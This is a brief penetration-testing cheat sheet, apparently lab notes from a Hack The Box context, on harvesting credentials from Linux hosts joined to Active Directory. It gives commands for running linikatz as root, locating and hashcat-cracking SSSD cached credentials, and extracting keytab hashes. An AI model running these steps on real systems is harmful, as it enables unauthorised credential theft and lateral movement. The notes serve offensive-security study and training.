Linux Active directory

Linikatz

Mimikatz for UNIX

Tool: linikatz

root@srv:/dev/shm# ./linikatz.sh
 _ _       _ _         _
| (_)_ __ (_) | ____ _| |_ ____
| | | '_ \| | |/ / _` | __|_  /
| | | | | | |   < (_| | |_ / /
|_|_|_| |_|_|_|\_\__,_|\__/___|

<SNIF>

SSSD Cached Credentials

Tool: SSSD-creds

#Find cached credentials
root@srv:/dev/shm$ find / -name *.ldb 2>/dev/null

#Cracking cached credentials
root@srv:/dev/shm$ hashcat -m 1800 cached.hash /usr/share/wordlists/rockyou.txt

Keytab

Tool: KeyTabExtract

#Extracting Keytab Hashes with KeyTabExtract
Intrusionz3r0X@htb[/htb]$ python3 keytabextract.py /opt/specialfiles/carlos.keytab

Last updated